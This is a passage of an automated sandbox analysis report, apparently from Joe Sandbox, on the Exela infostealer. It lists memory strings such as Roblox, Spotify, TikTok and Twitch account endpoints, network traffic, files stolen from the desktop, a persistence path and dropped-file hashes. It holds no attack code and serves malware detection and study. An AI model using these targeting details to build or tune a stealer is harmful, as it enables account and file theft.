            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652761806.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652833038.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652933030.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827210327.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827349619.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827119247.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/latest/names.html)
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/changelog.html
            Source: Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/changelog.html)
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652761806.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652833038.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652933030.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827210327.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827349619.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827119247.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/comparison.html#customization)
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652761806.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652833038.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652933030.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827210327.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827349619.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827119247.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization)
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652761806.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652833038.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652933030.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827210327.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827349619.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827119247.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/why.html#data-classes).
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75815000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784B3000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999688240.000002DCD0950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1730855532.000002DCD1FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1730855532.000002DCD1FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1887954156.000002DCCF6FF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1960432373.000002DCD1E4C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1733994092.000002DCCF6FF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1990364112.000002DCCF707000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1974031828.000002DCCF6FF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1976363678.000002DCCF706000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1960818465.000002DCD1E4C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1956730714.000002DCCF6F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1730855532.000002DCD1FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1730855532.000002DCD1FFF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD0750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999688240.000002DCD0950000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1960432373.000002DCD1E4C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1960818465.000002DCD1E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1730855532.000002DCD1FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830837521.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1975909415.000002DCCF608000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1989967017.000002DCCF60B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1967958889.000002DCCF608000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1983700654.000002DCCF609000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969997805.000002DCCF608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1986134334.000002DCCE890000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1662394777.000002DCCED46000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1662353023.000002DCCED6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/user/
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/user/0
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.roblox.com/my/account/json
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.spotify.com/api/account-settings/v1/profile
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1967958889.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1987192175.000002DCCEF1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitch.tv/
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.twitch.tv/P?
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.variomedia.de/
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1979336001.000002DCCF0DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969024366.000002DCCF085000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1956504995.000002DCCF085000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969507113.000002DCCF0C2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1988968795.000002DCCF0E0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1887859569.000002DCCF085000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1976001517.000002DCCF0DA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1733430816.000002DCCF075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zopeinterface.readthedocs.io/en/latest/
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\UMMBDNEQBN.docxJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\UMMBDNEQBN.xlsxJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\VLZDGUKUTZ.pdfJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\KZWFNRXYKI.pdfJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\VLZDGUKUTZ.docxJump to behavior
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA79B8B0_2_00007FF72AA79B8B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA8842C0_2_00007FF72AA8842C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA969500_2_00007FF72AA96950
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA779500_2_00007FF72AA77950
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA9789C0_2_00007FF72AA9789C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA96BCC0_2_00007FF72AA96BCC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA973500_2_00007FF72AA97350
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA833300_2_00007FF72AA83330
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA924C40_2_00007FF72AA924C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA83CC00_2_00007FF72AA83CC0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA88CB00_2_00007FF72AA88CB0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA865100_2_00007FF72AA86510
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA94CFC0_2_00007FF72AA94CFC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA824740_2_00007FF72AA82474
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA8AA100_2_00007FF72AA8AA10
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA8EA900_2_00007FF72AA8EA90
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA882780_2_00007FF72AA88278
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA822700_2_00007FF72AA82270
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA840C40_2_00007FF72AA840C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA790C00_2_00007FF72AA790C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA8F1100_2_00007FF72AA8F110
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA828840_2_00007FF72AA82884
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA915180_2_00007FF72AA91518
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA948600_2_00007FF72AA94860
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA820640_2_00007FF72AA82064
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA8E5FC0_2_00007FF72AA8E5FC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA9A5D80_2_00007FF72AA9A5D8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA79D2B0_2_00007FF72AA79D2B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA915180_2_00007FF72AA91518
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA8842C0_2_00007FF72AA8842C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA7A55D0_2_00007FF72AA7A55D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA826800_2_00007FF72AA82680
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA81E600_2_00007FF72AA81E60
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A7842C81_2_00007FF6E3A7842C
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A69B8B81_2_00007FF6E3A69B8B
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A8695081_2_00007FF6E3A86950
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A6795081_2_00007FF6E3A67950
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A8789C81_2_00007FF6E3A8789C
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A824C481_2_00007FF6E3A824C4
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A73CC081_2_00007FF6E3A73CC0
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A69D2B81_2_00007FF6E3A69D2B
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A8151881_2_00007FF6E3A81518
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A7651081_2_00007FF6E3A76510
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A84CFC81_2_00007FF6E3A84CFC
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A7247481_2_00007FF6E3A72474
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A78CB081_2_00007FF6E3A78CB0
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A86BCC81_2_00007FF6E3A86BCC
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A8735081_2_00007FF6E3A87350
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A7333081_2_00007FF6E3A73330
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A7227081_2_00007FF6E3A72270
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A7EA9081_2_00007FF6E3A7EA90
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A7827881_2_00007FF6E3A78278
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A7AA1081_2_00007FF6E3A7AA10
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A740C481_2_00007FF6E3A740C4
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A690C081_2_00007FF6E3A690C0
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A7F11081_2_00007FF6E3A7F110
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A8151881_2_00007FF6E3A81518
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A7206481_2_00007FF6E3A72064
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A8486081_2_00007FF6E3A84860
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A7288481_2_00007FF6E3A72884
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A71E6081_2_00007FF6E3A71E60
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A7268081_2_00007FF6E3A72680
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A8A5D881_2_00007FF6E3A8A5D8
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A7E5FC81_2_00007FF6E3A7E5FC
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A7842C81_2_00007FF6E3A7842C
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A6A55D81_2_00007FF6E3A6A55D
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\_MEI67602\VCRUNTIME140.dll D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\_MEI67602\_asyncio.pyd FA5A1E7031DE5849AB2AB5A177E366B41E1DF6BBD90C8D2418033A01C740771F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: String function: 00007FF72AA72B10 appears 47 times
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: String function: 00007FF6E3A62B10 appears 47 times
            Source: _overlapped.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
